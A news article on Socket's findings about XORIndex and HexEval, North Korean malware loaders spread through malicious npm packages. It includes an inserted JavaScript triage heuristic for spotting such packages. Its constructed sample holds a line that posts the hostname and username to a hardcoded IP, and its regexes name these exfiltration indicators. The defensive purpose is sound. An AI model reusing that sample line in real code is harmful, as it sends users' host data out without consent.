North Korean threat actors behind the notorious Contagious Interview campaign have expanded their operations with a new malware loader, according to Socket researchers.
The XORIndex loader accumulated over 9,000 downloads between June and July 2025; its principal targets are developers, job seekers and individuals believed to hold cryptocurrency or sensitive credentials.
XORIndex is used to collect data and run second-stage malware, ultimately resulting in cryptocurrency theft.
These downloads are part of a broader campaign, in which attackers published an additional 67 malicious packages to the npm registry – a database of open-source JavaScript packages.
These packages have been collectively downloaded more than 17,000 times, with 27 remaining live on the npm registry, the researchers said.
XORIndex was incorporated into 28 of the new packages, with others deploying the previously discovered malware loader HexEval, which had more than 8,000 additional downloads.
The new packages were discovered after Socket observed the threat actors publishing 35 malicious packages on the npm registry in June 2025. Each of these packages contained HexEval.
Socket has submitted takedown requests for the remaining packages to the npm security team and has petitioned for the suspension of the associated accounts.
The researchers said that the development of XORIndex reflects Contagious Interview actors’ ongoing investment in stealthier, more resilient software supply chain malware, capable of full system compromise.
“We expect the North Korean threat actors to reuse existing loaders like HexEval and XORIndex, while introducing new obfuscation techniques and loader variants,” the researchers wrote in the blog dated July 14, 2025.
Multi-Function Malware Loader
The researchers observed XORIndex contained in 28 malicious npm packages distributed across 18 npm accounts registered using 15 distinct email addresses.
Like HexEval, the malware performs a range of functions for the attackers.
Upon installation, XORIndex collects local host telemetry, including hostname, current username, operating system type and external IP address.
This information is exfiltrated to hardcoded command and control (C2) infrastructure.
The malware then loads BeaverTail, a staple second-stage malware used in the North Korean Contagious Interview attacks.
BeaverTail scans for and collects data from dozens of known desktop wallet directories and browser extension paths. The collection targets material that enables the compromise of cryptocurrency wallets, including wallet databases, browser extension local storage, macOS keychain credentials, Solana IDs and wallet-related JSON files.
The data is exfiltrated to a hardcoded IP-based HTTP endpoint and deleted once the upload succeeds.
BeaverTail then attempts to load InvisibleFerret, a known third-stage backdoor linked to this operation.
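The install-time behaviour described above (a package that runs code during installation, gathers host telemetry and posts it to a hardcoded IP-based HTTP endpoint) lends itself to a simple static triage check. The following is an added example, not Socket's code or anything from the campaign; it assumes the caller has already unpacked a package and passes its package.json and source files as strings, and the sample package it scans is constructed here and contains only the indicators, not real malware.

```javascript
// Static triage heuristic for an unpacked npm package (added example, not Socket's
// code). It scores the pattern the article describes: an install-time lifecycle
// hook combined with source that collects host telemetry and contacts a
// hardcoded IP-based HTTP endpoint.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];
const TELEMETRY_APIS = [/os\.hostname\(/, /os\.userInfo\(/, /os\.platform\(/, /os\.type\(/];
// URL whose host is a bare IPv4 literal, optionally with a port and path.
const IP_ENDPOINT = /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?[^\s"'`]*/g;

// Lifecycle scripts that npm runs automatically during `npm install`.
function installHooks(pkgJson) {
  const scripts = pkgJson.scripts || {};
  return INSTALL_HOOKS.filter((h) => typeof scripts[h] === "string");
}

// sources: { "path/in/package.js": "file contents" } supplied by the caller.
function triagePackage(pkgJson, sources) {
  const hooks = installHooks(pkgJson);
  const findings = [];
  for (const [file, code] of Object.entries(sources)) {
    const endpoints = [...new Set(code.match(IP_ENDPOINT) || [])];
    const telemetry = TELEMETRY_APIS.filter((re) => re.test(code)).length;
    // Require both signals in the same file: an IP literal alone is common in tests.
    if (endpoints.length > 0 && telemetry >= 2) findings.push({ file, endpoints, telemetry });
  }
  let score = 0;
  if (hooks.length > 0) score += 1;                        // code runs at install time
  if (findings.length > 0) score += 2;                     // telemetry + IP endpoint
  if (hooks.length > 0 && findings.length > 0) score += 1; // both together: strongest signal
  const verdict = score >= 3 ? "block" : score > 0 ? "review" : "clean";
  return { name: pkgJson.name, hooks, findings, verdict };
}

// Constructed samples: only the indicators, not a real package.
// 203.0.113.0/24 is the RFC 5737 documentation range.
const SUSPICIOUS_PKG = { name: "example-suspicious", scripts: { postinstall: "node setup.js" } };
const SUSPICIOUS_SRC = {
  "setup.js": 'const os=require("os");const h=os.hostname();const u=os.userInfo().username;' +
    'fetch("http://203.0.113.10:1224/collect",{method:"POST",body:JSON.stringify({h,u})});',
};
const BENIGN_PKG = { name: "example-benign", scripts: { test: "node test.js" } };
const BENIGN_SRC = { "index.js": "module.exports = (a, b) => a + b;" };

if (typeof require !== "undefined" && require.main === module) {
  console.log(JSON.stringify(triagePackage(SUSPICIOUS_PKG, SUSPICIOUS_SRC), null, 2));
  console.log(JSON.stringify(triagePackage(BENIGN_PKG, BENIGN_SRC), null, 2));
}
```

A "block" verdict is a reason to hold the package for manual review of the hook script, not proof of compromise; legitimate native-addon packages also use install hooks, which is why the heuristic only escalates when telemetry and an IP endpoint appear together.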
Ongoing Contagious Interview Campaign
The Contagious Interview campaign was first reported in November 2023 and has since evolved, with multiple malware versions surfacing.
The campaign has been linked to the notorious North Korean state-sponsored group Lazarus.
The attackers exploit job search platforms such as LinkedIn to pose as prospective employers with job opportunities for developers.
To make their deception convincing, they set up fake websites and distribute malicious software under the guise of professional development tools.
Victims are tricked into downloading malicious software disguised as legitimate tools on open-source repositories such as GitHub and npm.